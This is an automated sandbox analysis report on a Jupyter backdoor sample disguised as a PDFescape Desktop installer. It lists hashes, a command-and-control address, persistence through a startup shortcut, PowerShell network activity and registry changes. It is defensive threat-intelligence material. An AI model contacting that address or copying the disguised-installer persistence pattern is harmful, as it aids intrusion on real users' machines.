Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-12-2024 16:46
Static task
static1
Behavioral task
behavioral1
Sample
aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe
Resource
win7-20241010-en
General
-
Target
aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe
-
Size
117.6MB
-
MD5
015fd4bc87666d454f1517b2970dc097
-
SHA1
88685aaaba4297deef30ac4fe9bd065baa7c0c0d
-
SHA256
aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d
-
SHA512
ed3378510720b92fa77098c4d48763ea04e52c63bbbf074b711e16ef781281314dad6a7e0d3069bf0cd7598c1ea426b6effabd691ae0a945e79144afdd153637
-
SSDEEP
393216:yE9KcOY3vAawF4vpUgCRNPAo1ffffffffffffffffffffffffffffffffffffffi:yE8cOwwF4WRNPAbJT
Malware Config
Extracted
jupyter
AT-3
http://185.236.202.137
Signatures
-
Jupyter Backdoor/Client payload 1 IoCs
resource yara_rule behavioral2/memory/4796-176-0x0000000007C70000-0x0000000007C8C000-memory.dmp family_jupyter -
Jupyter family
-
Blocklisted process makes network request 32 IoCs
flow pid Process 29 4820 powershell.exe 30 1836 powershell.exe 31 3708 powershell.exe 32 4796 powershell.exe 33 4252 powershell.exe 34 5000 powershell.exe 35 700 powershell.exe 36 4688 powershell.exe 49 3708 powershell.exe 50 4252 powershell.exe 51 4688 powershell.exe 56 5000 powershell.exe 57 700 powershell.exe 58 4820 powershell.exe 59 1836 powershell.exe 60 4796 powershell.exe 61 4252 powershell.exe 64 4796 powershell.exe 66 3708 powershell.exe 67 5000 powershell.exe 68 700 powershell.exe 69 4820 powershell.exe 70 4688 powershell.exe 71 1836 powershell.exe 72 4796 powershell.exe 73 4252 powershell.exe 74 4820 powershell.exe 75 3708 powershell.exe 76 1836 powershell.exe 77 4688 powershell.exe 78 5000 powershell.exe 79 700 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup\a4f914844ef46f9bec48aaa58ab5e.lnk powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 3160 PDFescape_Desktop_Installer.exe 2400 PDFescapeDesktopInstaller.exe -
Loads dropped DLL 5 IoCs
pid Process 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 2292 regsvr32.exe 3552 DllHost.exe 3160 PDFescape_Desktop_Installer.exe -
pid Process 3708 powershell.exe 4260 powershell.exe 4820 powershell.exe 700 powershell.exe 4252 powershell.exe 4796 powershell.exe 5000 powershell.exe 4688 powershell.exe 1836 powershell.exe 5080 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PDFescapeDesktopInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PDFescape_Desktop_Installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58996E59-0000-4D4E-8CEE-5B22F2107655}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DF3B4C08-D200-47C9-A396-689B8704BC9A}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDEAB94F-0000-43AF-8408-C9BA782BF5D4}\LocalServer32\ = "\"C:\\ProgramData\\PDFescape Desktop\\Installation\\PDFescapeDesktopInstaller.exe\"" PDFescapeDesktopInstaller.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}\1.0\ = "Statistics" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB86DDD7-CFE1-4D8B-AA2F-A732C3E66A7D}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F592843-0000-4833-9F47-F7332F3CB3F8}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4A1BB700-0000-4156-A8FA-3DD1DFBCD933}\TypeLib\Version = "1.0" PDFescapeDesktopInstaller.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39E42990-0000-4230-9F81-62B537B6B839}\Version regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C753468E-0000-46FA-B49D-C133BC303D3B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\ = "IDownloadItemModule" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A92F07A1-0000-40B0-AF9F-CCEFA34AB08E}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{57F9206E-944A-444B-B993-9D356DAEF36C}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3BCC59F0-6C35-4FF0-86A9-0A2E267E65B0} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9242C198-0000-4F73-935D-1C7905796C67}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}\1.0\FLAGS regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0003DEA4-0000-40CB-B0FB-D1492CA1149F}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DF3B4C08-D200-47C9-A396-689B8704BC9A}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56A7C619-0000-4540-A77A-0C6E518E7530} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A4CB4452-0000-4D69-B194-10F00E72CF6B}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0003DEA4-0000-40CB-B0FB-D1492CA1149F}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EB858205-0000-4418-8924-5D16D15EFD6C} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EB858205-0000-4418-8924-5D16D15EFD6C}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4BD66CEF-B189-4A0E-B5B4-497510EEA230}\TypeLib regsvr32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{2F9E253B-E274-4714-AE58-E879196F7E37}\AccessPermission = 010014804c0000005c000000140000003000000002001c0001000000110014000400000001010000000000100010000002001c0001000000000014000b0000000101000000000001000000000102000000000005200000002002000001020000000000052000000020020000 PDFescapeDesktopInstaller.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9242C198-0000-4F73-935D-1C7905796C67} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F592843-0000-4833-9F47-F7332F3CB3F8} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DF3B4C08-D200-47C9-A396-689B8704BC9A}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C7335C66-0000-4AC7-9E60-1E7BFE06708C}\1.0\0\win32 PDFescapeDesktopInstaller.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9981C967-0000-4633-8737-F55C3CC344B0}\Version regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{40FA2F96-0000-4F05-84D8-C1256EAB70A0}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C7335C66-0000-4AC7-9E60-1E7BFE06708C}\1.0\HELPDIR PDFescapeDesktopInstaller.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9242C198-0000-4F73-935D-1C7905796C67} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4A1BB700-0000-4156-A8FA-3DD1DFBCD933}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" PDFescapeDesktopInstaller.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB86DDD7-CFE1-4D8B-AA2F-A732C3E66A7D}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{29CF5B0B-0000-4C5E-AAE0-B91F4FD87378}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F592843-0000-4833-9F47-F7332F3CB3F8}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C11A590C-0000-4C63-8E93-279E07FA7F96}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A4CB4452-0000-4D69-B194-10F00E72CF6B}\ = "DownloadItemModule3_1 Class" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3BCC59F0-6C35-4FF0-86A9-0A2E267E65B0}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{151CD23A-0000-4238-A15C-69CA34E0BE67}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A4A11886-0000-484A-BB3C-5874E6828AA1}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C7335C66-0000-4AC7-9E60-1E7BFE06708C}\1.0\HELPDIR\ = "C:\\ProgramData\\PDFescape Desktop\\Installation" PDFescapeDesktopInstaller.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77CDE36D-0000-4223-8E25-3FFD866B17E8}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A4CB4452-0000-4D69-B194-10F00E72CF6B}\InprocServer32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C8B6481C-0000-4643-989B-7D163445E1DD}\Version\ = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3}\ = "IStartDataStruct" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{52D88735-0000-4347-BF52-DC4A219E3A2B}\ = "IGeoIPStruct" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F592843-0000-4833-9F47-F7332F3CB3F8}\ = "IXMLSave" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{869F03A3-0000-4B45-9FB1-DF6B1387AB03}\TypeLib\Version = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3BCC59F0-6C35-4FF0-86A9-0A2E267E65B0}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77CDE36D-0000-4223-8E25-3FFD866B17E8}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A2F518D6-0000-4360-A019-3409E7ADC462}\TypeLib\Version = "1.0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A2F518D6-0000-4360-A019-3409E7ADC462}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A92F07A1-0000-40B0-AF9F-CCEFA34AB08E}\ = "IDownloadItemModule3_1" regsvr32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{2F9E253B-E274-4714-AE58-E879196F7E37}\AccessPermission = 010014804c0000005c000000140000003000000002001c0001000000110014000400000001010000000000100010000002001c0001000000000014000b0000000101000000000001000000000102000000000005200000002002000001020000000000052000000020020000 PDFescape_Desktop_Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39E42990-0000-4230-9F81-62B537B6B839}\Version\ = "1.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A4CB4452-0000-4D69-B194-10F00E72CF6B}\Version regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB86DDD7-CFE1-4D8B-AA2F-A732C3E66A7D}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C8B6481C-0000-4643-989B-7D163445E1DD}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{869F03A3-0000-4B45-9FB1-DF6B1387AB03}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe -
NTFS ADS 8 IoCs
description ioc Process File created C:\Users\Admin\DESkTOP\Microsoft Edge.lnkC:\Users\PubLIC\deSKtop\Acrobat Reader DC.lnk C:\Users\PubLIC\deSKtop\Firefox.lnk C:\Users\PubLIC\deSKtop\Google Chrome.lnk C:\Users\PubLIC\deSKtop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DESkTOP\Microsoft Edge.lnkC:\Users\PubLIC\deSKtop\Acrobat Reader DC.lnk C:\Users\PubLIC\deSKtop\Firefox.lnk C:\Users\PubLIC\deSKtop\Google Chrome.lnk C:\Users\PubLIC\deSKtop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DESkTOP\Microsoft Edge.lnkC:\Users\PubLIC\deSKtop\Acrobat Reader DC.lnk C:\Users\PubLIC\deSKtop\Firefox.lnk C:\Users\PubLIC\deSKtop\Google Chrome.lnk C:\Users\PubLIC\deSKtop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DESkTOP\Microsoft Edge.lnkC:\Users\PubLIC\deSKtop\Acrobat Reader DC.lnk C:\Users\PubLIC\deSKtop\Firefox.lnk C:\Users\PubLIC\deSKtop\Google Chrome.lnk C:\Users\PubLIC\deSKtop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DESkTOP\Microsoft Edge.lnkC:\Users\PubLIC\deSKtop\Acrobat Reader DC.lnk C:\Users\PubLIC\deSKtop\Firefox.lnk C:\Users\PubLIC\deSKtop\Google Chrome.lnk C:\Users\PubLIC\deSKtop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DESkTOP\Microsoft Edge.lnkC:\Users\PubLIC\deSKtop\Acrobat Reader DC.lnk C:\Users\PubLIC\deSKtop\Firefox.lnk C:\Users\PubLIC\deSKtop\Google Chrome.lnk C:\Users\PubLIC\deSKtop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DESkTOP\Microsoft Edge.lnkC:\Users\PubLIC\deSKtop\Acrobat Reader DC.lnk C:\Users\PubLIC\deSKtop\Firefox.lnk C:\Users\PubLIC\deSKtop\Google Chrome.lnk C:\Users\PubLIC\deSKtop\VLC media player.lnk powershell.exe File created C:\Users\Admin\DESkTOP\Microsoft Edge.lnkC:\Users\PubLIC\deSKtop\Acrobat Reader DC.lnk C:\Users\PubLIC\deSKtop\Firefox.lnk C:\Users\PubLIC\deSKtop\Google Chrome.lnk C:\Users\PubLIC\deSKtop\VLC media player.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 3160 PDFescape_Desktop_Installer.exe 3160 PDFescape_Desktop_Installer.exe 5000 powershell.exe 5000 powershell.exe 4688 powershell.exe 4688 powershell.exe 4820 powershell.exe 4820 powershell.exe 700 powershell.exe 700 powershell.exe 4796 powershell.exe 4796 powershell.exe 4252 powershell.exe 4252 powershell.exe 1836 powershell.exe 1836 powershell.exe 3708 powershell.exe 3708 powershell.exe 4688 powershell.exe 4260 powershell.exe 4260 powershell.exe 5080 powershell.exe 5080 powershell.exe 4820 powershell.exe 700 powershell.exe 5000 powershell.exe 1836 powershell.exe 4796 powershell.exe 3708 powershell.exe 4252 powershell.exe 5080 powershell.exe 4260 powershell.exe 4796 powershell.exe 4688 powershell.exe 4820 powershell.exe 700 powershell.exe 5000 powershell.exe 1836 powershell.exe 3708 powershell.exe 4252 powershell.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
description pid Process Token: SeDebugPrivilege 4688 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeDebugPrivilege 5000 powershell.exe Token: SeDebugPrivilege 4820 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4252 powershell.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 4260 powershell.exe Token: SeDebugPrivilege 5080 powershell.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 944 wrote to memory of 1488 944 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe 82 PID 944 wrote to memory of 1488 944 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe 82 PID 944 wrote to memory of 1488 944 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe 82 PID 1488 wrote to memory of 3160 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 83 PID 1488 wrote to memory of 3160 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 83 PID 1488 wrote to memory of 3160 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 83 PID 3160 wrote to memory of 2292 3160 PDFescape_Desktop_Installer.exe 84 PID 3160 wrote to memory of 2292 3160 PDFescape_Desktop_Installer.exe 84 PID 3160 wrote to memory of 2292 3160 PDFescape_Desktop_Installer.exe 84 PID 3160 wrote to memory of 2400 3160 PDFescape_Desktop_Installer.exe 85 PID 3160 wrote to memory of 2400 3160 PDFescape_Desktop_Installer.exe 85 PID 3160 wrote to memory of 2400 3160 PDFescape_Desktop_Installer.exe 85 PID 1488 wrote to memory of 4820 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 94 PID 1488 wrote to memory of 4820 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 94 PID 1488 wrote to memory of 4820 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 94 PID 1488 wrote to memory of 700 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 96 PID 1488 wrote to memory of 700 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 96 PID 1488 wrote to memory of 700 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 96 PID 1488 wrote to memory of 5000 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 98 PID 1488 wrote to memory of 5000 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 98 PID 1488 wrote to memory of 5000 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 98 PID 1488 wrote to memory of 4688 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 100 PID 1488 wrote to memory of 4688 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 100 PID 1488 wrote to memory of 4688 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 100 PID 1488 wrote to memory of 1836 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 102 PID 1488 wrote to memory of 1836 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 102 PID 1488 wrote to memory of 1836 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 102 PID 1488 wrote to memory of 4252 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 104 PID 1488 wrote to memory of 4252 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 104 PID 1488 wrote to memory of 4252 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 104 PID 1488 wrote to memory of 4796 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 106 PID 1488 wrote to memory of 4796 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 106 PID 1488 wrote to memory of 4796 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 106 PID 1488 wrote to memory of 3708 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 108 PID 1488 wrote to memory of 3708 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 108 PID 1488 wrote to memory of 3708 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 108 PID 1488 wrote to memory of 4260 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 110 PID 1488 wrote to memory of 4260 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 110 PID 1488 wrote to memory of 4260 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 110 PID 1488 wrote to memory of 5080 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 112 PID 1488 wrote to memory of 5080 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 112 PID 1488 wrote to memory of 5080 1488 aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp 112
Processes
-
C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe"C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Users\Admin\AppData\Local\Temp\is-RL6S9.tmp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp"C:\Users\Admin\AppData\Local\Temp\is-RL6S9.tmp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp" /SL5="$60062,122284744,999424,C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\is-BAHDH.tmp\PDFescape_Desktop_Installer.exe"C:\Users\Admin\AppData\Local\Temp\is-BAHDH.tmp\PDFescape_Desktop_Installer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2292
-
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe"C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2400
-
-
-
